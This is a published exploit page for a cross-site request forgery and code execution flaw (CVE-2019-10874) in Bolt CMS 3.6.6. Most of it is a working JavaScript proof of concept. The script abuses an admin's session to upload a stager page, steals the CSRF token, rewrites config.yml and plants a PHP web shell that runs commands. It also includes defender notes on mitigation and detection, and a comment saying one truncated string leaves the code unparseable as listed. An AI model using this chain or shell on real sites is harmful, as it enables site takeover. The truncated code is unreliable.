
Bolt CMS 3.6.6 Cross Site Request Forgery / Code Execution

Bolt CMS 3.6.6 Cross Site Request Forgery / Code Execution
Posted Apr 8, 2019
Authored by Felipe Gaspar

Bolt CMS version 3.6.6 suffers from cross site request forgery and code execution vulnerabilities.

tags | exploit, vulnerability, code execution, csrf
advisories | CVE-2019-10874
MD5 | 64aa4f32a9e9165b16e9ca3b86e6f171

Bolt CMS 3.6.6 Cross Site Request Forgery / Code Execution

<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
// Proof-of-concept page for CVE-2019-10874 (Bolt CMS 3.6.6, per the advisory above).
// Loaded by a browser that holds a Bolt admin session, it sends a credentialed
// cross-origin POST to /bolt/upload and stores an HTML "stager" that Bolt then
// serves from the site's own origin under /files/. The hidden iframe at the bottom
// of the page loads that stager, which therefore runs same-origin: it reads the
// CSRF token out of the config editor form, edits config.yml and uploads a .php file.
//
// Defender notes (what this PoC relies on, and what to look for):
//  - The two multipart uploads in this PoC carry no CSRF token at all, while the
//    config.yml edit in ModifyAllowedExtensions does send file_edit[_token]; the
//    upload endpoint is the cross-site entry point here.
//  - Uploaded files are loaded straight from /files/<YYYY-MM>/ on the application
//    origin, so an uploaded .html page runs with the victim's session and can read
//    admin pages (including their CSRF tokens).
//  - Mitigation: require and validate an anti-CSRF token on every state-changing
//    admin endpoint, uploads included; serve user uploads from a separate origin or
//    with headers that stop them rendering as HTML; enforce the accepted upload
//    types server-side; set the admin session cookie SameSite; apply the vendor fix
//    for this CVE (the fixed version is not stated on this page).
//  - Detection: POSTs to /bolt/upload or /bolt/file/edit/config/config.yml whose
//    Origin/Referer does not match the site; new .html or .php files under files/;
//    unexpected edits to config.yml.
function exploit() {

// Base URL of the Bolt instance; hard-coded to a local test target.
var target = "http://127.0.0.1"

var bolt_admin_url = target + "/bolt";

// Stage 1: cross-site multipart POST of the stager page. withCredentials makes the
// browser attach the victim's Bolt session cookie; no CSRF token is included.
var xhr = new XMLHttpRequest();
xhr.open("POST", bolt_admin_url + "/upload", true);
xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159");
xhr.withCredentials = true;
// The multipart body. The file part is declared text/plain but named stager.html;
// its content (the concatenated string below, up to the closing boundary) is the
// stager's own <script>, which runs later from the /files/ origin.
var body = "-----------------------------130713229751679908527494159\r\n" +
"Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"\x3cscript\x3e\r\n" +
"\r\n" +
"function exploit(){\r\n" +
"\r\n" +
" var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" +
"\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" \r\n" +
" if(xhr) {\r\n" +
// Stager step 1: same-origin GET of the config editor page. The handler below
// takes the value of the first <input> in the response as the CSRF token.
" xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" +
" xhr.onreadystatechange = handler;\r\n" +
" xhr.send();\r\n" +
" }\r\n" +
"\r\n" +
" function handler(){\r\n" +
" if (xhr.readyState == 4 && xhr.status == 200) {\r\n" +
" user_page = document.createElement(\'html\');\r\n" +
" user_page.innerHTML = xhr.responseText;\r\n" +
" token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" +
" console.log(\"Token obtained:\" + token_input);\r\n" +
" ModifyAllowedExtensions(token_input);\r\n" +
" UploadShell();\r\n" +
" }\r\n" +
" }\r\n" +
"\r\n" +
// Stager step 2: POST a replacement config.yml, authenticated with the token just
// read. The form body is a URL-encoded copy of Bolt's default config.yml;
// presumably it also changes the accepted upload types (the function name
// suggests so), but that part is not visible in this listing.
" function ModifyAllowedExtensions(token) {\r\n" +
"\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" +
" xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" +
" xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" +
" xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" +
" xhr.withCredentials = true;\r\n" +
// NOTE: the string literal that starts on the next line is truncated in this
// listing (it ends mid-literal at "overri" and the following line begins a new
// statement), so this block as shown does not parse.
" var body = \"file_edit%5B_token%5D=\"+token+\"&file_edit%5Bcontents%5D=%23+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\'%2C+\\\'mysql\\\'+or+\\\'postgres\\\'.%0D%0A%23%0D%0A%23+For+SQLite%2C+only+the+databasename+is+required.+However%2C+MySQL+and+PostgreSQL%0D%0A%23+also+require+\\\'username\\\'%2C+\\\'password\\\'%2C+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database%0D%0A%23+server+is+not+on+the+same+host+as+the+web+server.%0D%0A%23%0D%0A%23+If+you\\\'re+trying+out+Bolt%2C+just+keep+it+set+to+SQLite+for+now.%0D%0Adatabase%3A%0D%0A++++driver%3A+sqlite%0D%0A++++databasename%3A+bolt%0D%0A%0D%0A%23+The+name+of+the+website%0D%0Asitename%3A+A+sample+site%0D%0Apayoff%3A+The+amazing+payoff+goes+here%0D%0A%0D%0A%23+The+theme+to+use.%0D%0A%23%0D%0A%23+Don\\\'t+edit+the+provided+templates+directly%2C+because+they+_will_+get+updated%0D%0A%23+in+next+releases.+If+you+wish+to+modify+a+default+theme%2C+copy+its+folder%2C+and%0D%0A%23+change+the+name+here+accordingly.%0D%0Atheme%3A+base-2018%0D%0A%0D%0A%23+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the%0D%0A%23+fallback+locale+is+\\\'en_GB\\\'.+For+available+options%2C+see%3A%0D%0A%23+https%3A%2F%2Fdocs.bolt.cm%2Fother%2Flocales%0D%0A%23%0D%0A%23+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the%0D%0A%23+locale+to+get+everything+to+work+as+desired.%0D%0A%23%0D%0A%23+This+can+be+done+as+%5Bnl_NL%2C+Dutch_Netherlands%5D+when+specifying+multiple%0D%0A%23+locales%2C+ensure+the+first+is+a+standard+locale.%0D%0Alocale%3A+en_GB%0D%0A%0D%0A%23+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone%0D%0A%23+settings%2C+see%3A+http%3A%2F%2Fphp.net%2Fmanual%2Fen%2Ftimezones.php%0D%0A%23+timezone%3A+UTC%0D%0A%0D%0A%23+Set+maintenance+mode+on+or+off.%0D%0A%23%0D%0A%23+While+in+maintenance+mode%2C+only+users+of+level+editor+or+higher+can+access+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+All+other+visitors+are+presented+with+a+notice+that+the+site+is+curre
ntly%0D%0A%23+offline.%0D%0A%23%0D%0A%23+The+default+template+file+can+be+found+in+%2Fapp%2Ftheme_defaults%2F+and+overridden%0D%0A%23+with+this+option+using+your+own+theme.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Amaintenance_mode%3A+false%0D%0Amaintenance_template%3A+maintenance_default.twig%0D%0A%0D%0A%23+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily%2C+weekly%2C%0D%0A%23+monthly+and+yearly+jobs.%0D%0A%23%0D%0A%23+Default%3A+3+(3+am)%0D%0Acron_hour%3A+3%0D%0A%0D%0A%23+If+your+site+is+reachable+under+different+urls+(say%2C+both+blog.example.org%2F%0D%0A%23+as+well+as+example.org%2F)%2C+it\\\'s+a+good+idea+to+set+one+of+these+as+the%0D%0A%23+canonical%2C+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.%0D%0A%23%0D%0A%23+If+you+include+%60https%3A%2F%2F%60%2C+it+will+be+included+in+the+canonical+urls.%0D%0A%23canonical%3A+example.org%0D%0A%0D%0A%23+Bolt+can+insert+a+%3Clink+rel%3D%22shortcut+icon%22%3E+for+all+pages+on+the+site.%0D%0A%0D%0A%23+Note%3A+The+location+given+is+relative+to+the+currently+selected+theme.+If%0D%0A%23+++++++you+want+to+set+the+icon+yourself%2C+just+don\\\'t+enable+the+following+line.%0D%0A%23favicon%3A+images%2Ffavicon-bolt.ico%0D%0A%0D%0A%23+The+default+content+to+use+for+the+homepage%2C+and+the+template+to+render+it%0D%0A%23+with.+This+can+either+be+a+specific+record+(like+%60page%2F1%60)+or+a+listing+of%0D%0A%23+records+(like+%60entries%60).+In+the+chosen+\\\'homepage_template\\\'%2C+you+will+have%0D%0A%23+%60record%60+or+%60records%60+at+your+disposal%2C+depending+on+the+\\\'homepage\\\'+setting.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on%0D%0A%23+++++++the+website%2C+be+sure+to+check+for+a+theme.yml+file+in+your+them
e\\\'s%0D%0A%23+++++++folder.+If+a+template+is+set+there%2C+it+will+overri
" var aBody = new Uint8Array(body.length);\r\n" +
" for (var i = 0; i \x3c aBody.length; i++)\r\n" +
" aBody[i] = body.charCodeAt(i); \r\n" +
" xhr.send(new Blob([aBody]));\r\n" +
" }\r\n" +
"\r\n" +
// Stager step 3: a second multipart upload to the same endpoint, again without a
// CSRF token, this time of a .php file.
" function UploadShell() {\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" +
" xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" +
" xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" +
" xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" +
" xhr.withCredentials = true;\r\n" +
" var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" +
" \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" +
" \"Content-Type: text/plain\\r\\n\" + \r\n" +
" \"\\r\\n\" + \r\n" +
" \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" +
" \"\\r\\n\" + \r\n" +
" \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" +
" var aBody = new Uint8Array(body.length);\r\n" +
" for (var i = 0; i \x3c aBody.length; i++)\r\n" +
" aBody[i] = body.charCodeAt(i); \r\n" +
" xhr.send(new Blob([aBody]));\r\n" +
" }\r\n" +
" }\r\n" +
"\r\n" +
" exploit();\r\n" +
"\r\n" +
"\x3c/script\x3e\r\n" +
"\n" +
"\r\n" +
"-----------------------------130713229751679908527494159--\r\n";
// Send the multipart body as a Blob of raw char codes (presumably so the
// boundary/CRLF framing goes out byte-for-byte).
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));

// Stage 2: after a fixed 2 s wait (assumes the upload has completed), point the
// hidden iframe at the uploaded stager. The path is built from the client's
// current year and month, i.e. the PoC expects Bolt to store uploads under
// /files/<YYYY-MM>/.
setTimeout(function() {
var dateObj = new Date();
var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2));
document.getElementById('stager').src = target + "/files/"+folder+"/stager.html";
console.log("Called stager! Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami");
}, 2000);

}

// Run the request chain once the page has finished loading.
window.onload = () => {
  exploit();
};

</script>
<iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe>
</body>
</html>


